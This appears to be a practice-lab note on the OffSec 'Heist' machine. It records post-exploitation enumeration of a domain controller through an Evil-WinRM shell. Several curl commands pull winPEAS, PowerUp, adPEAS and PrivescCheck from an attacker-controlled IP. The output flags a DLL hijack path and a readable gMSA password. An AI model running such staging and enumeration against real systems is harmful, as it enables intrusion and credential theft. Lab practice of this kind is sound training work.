InfoSec LAB

Heist_OffSec_Automated

Created: 3 min read

PEAS

Conducting an automated enumeration after performing a manual enumeration on the dc01.heist.offsec(192.168.198.165) host.

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/winPEASany.exe -OutFile C:\tmp\winPEASany.exe

Delivery complete

Executing PEAS

ENV

ÉÍÍÍÍÍÍÍÍÍ͹ User Environment Variables
È Check for some passwords or keys in the env variables 
    COMPUTERNAME: DC01
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\enox\AppData\Local
    PSModulePath: C:\Users\enox\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Program Files\Python39\Scripts\;C:\Program Files\Python39\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\enox\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 25
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW;.CPL
    USERPROFILE: C:\Users\enox
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 0101
    USERNAME: enox
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    ComSpec: C:\Windows\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\enox\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 2
    APPDATA: C:\Users\enox\AppData\Roaming
    TMP: C:\Users\enox\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: HEIST
    USERDNSDOMAIN: heist.offsec
 
ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Program Files\Python39\Scripts\;C:\Program Files\Python39\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.PY;.PYW
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 2
    PROCESSOR_LEVEL: 25
    PROCESSOR_IDENTIFIER: AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
    PROCESSOR_REVISION: 0101

N/A

UAC

PowerShell

NTLM

Token Privileges (enox)

Enumerated

Services

PowerUp.ps1

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/PowerUp.ps1 -OutFile C:\tmp\PowerUp.ps1

Delivery complete

*Evil-WinRM* PS C:\tmp> . .\PowerUp.ps1
*Evil-WinRM* PS C:\tmp> Invoke-AllChecks
Access denied 
 
ModifiablePath    : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
IdentityReference : HEIST\enox
Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
%PATH%            : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
Name              : C:\Users\enox\AppData\Local\Microsoft\WindowsApps
Check             : %PATH% .dll Hijacks
AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\enox\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

adPEAS

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/adPEAS.ps1 -OutFile C:\tmp\adPEAS.ps1

Delivery complete

Executing adPEAS

Domain

Add-Computer

gMSA

The enox user is able to read gMSA password of the svc_apache$ account.

Interesting

svc_apache$ is DC?

BloodHound

*Evil-WinRM* PS C:\tmp> ls *.zip
s
 
    Directory: C:\tmp
 
 
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         7/7/2025   8:12 AM          11391 heist.offsec_20250707081211_BloodHound.zip

Ingestion complete.

PrivescCheck

*Evil-WinRM* PS C:\tmp> curl http://192.168.45.176/PrivescCheck.ps1 -OutFile C:\tmp\PrivescCheck.ps1

Delivery complete

*Evil-WinRM* PS C:\tmp> . .\PrivescCheck.ps1
*Evil-WinRM* PS C:\tmp> Invoke-PrivescCheck

Executing PrivescCheck

Services

┏━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ CATEGORY ┃ TA0004 - Privilege Escalation                     ┃
┃ NAME     ┃ Service list (non-default)                        ┃
┃ TYPE     ┃ Base                                              ┃
┣━━━━━━━━━━┻━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┫
┃ Get information about third-party services. It does so by    ┃
┃ parsing the target executable's metadata and checking        ┃
┃ whether the publisher is Microsoft.                          ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛
 
 
Name        : FlaskService
DisplayName : FlaskService
ImagePath   : C:\Program Files\nssm-2.24\win64\nssm.exe
User        : HEIST\enox
StartMode   : Automatic
 
Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled
 
Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic
 
Name        : VM3DService
DisplayName : @oem3.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic
 
Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic
 
 
 
[*] Status: Informational - Severity: None - Execution time: 00:00:01.441

FlaskService

LSA Protection

Credential Guard

LAPS

Interactive Graph View

Backlinks